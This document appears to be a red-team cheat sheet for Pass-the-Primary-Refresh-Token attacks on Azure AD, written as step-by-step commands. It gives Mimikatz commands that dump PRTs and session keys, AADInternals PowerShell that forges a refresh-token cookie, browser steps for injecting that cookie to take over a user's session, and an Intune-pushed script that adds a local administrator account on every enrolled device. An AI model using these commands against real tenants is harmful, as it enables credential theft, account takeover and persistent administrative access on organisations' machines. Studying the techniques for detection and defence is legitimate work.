Pass-the-PRT

Pass-the-Primary Refresh Token (PRT)

Steps

1) Extract PRT, Session Key (KeyValue), and Tenant ID

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap" ""exit"'

2) Extract Context Key, ClearKey, and Derived Key

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:<KEY VALUE> /unprotect" "exit"'

3) Request Access Token (Cookie) to All Applications

Import-Module .\AADInternals.psd1

$tempPRT = '<PRT>'
while($tempPRT.Length % 4) {$tempPRT += "="}
$PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($tempPRT))
$ClearKey = "<CLEARKEY>"
$SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce

4) Copy the value from the above command and use it with a web browser:

• Open the browser in Incognito mode.

• Go to https://login.microsoftonline.com/login.srf.

• Press F12 (Chrome dev tools) -> Application -> Cookies

• Clear all cookies and then add one named x-ms-RefreshTokenCredential for https://login.microsoftonline.com and set its value to that retrieved from AADInternals

• Mark HTTPOnly and Secure for the cookie.

• Visit https://login.microsoftonline.com/login.srf again, and access will be granted as the user.

• Now, you can also access portal.azure.com.

Intune

In addition to passing PRT, a user with Global Administrator or Intune Administrator role can execute PowerShell scripts on an enrolled Windows device. The script runs with SYSTEM privileges on the device. Here are the steps involved:

1) Access Intune Portal (Requires Global Administrator and Intune Administrator privileges)

https://endpoint.microsoft.com/#home

2) Check enrolled devices

Go to:

Devices -> All Devices

3) Execute powershell scripts

Go to Scripts and click on Add for Windows 10.

Create a new script and select a script, for example, adduser.ps1:

$passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
New-LocalUser -Name <USERNAME> -Password $passwd
Add-LocalGroupMember -Group Administrators -Member <USERNAME>

4) Configure script execution

Select Run script in 64-bit PowerShell Host.

On the assignment page, select "Add all users" and "Add all devices."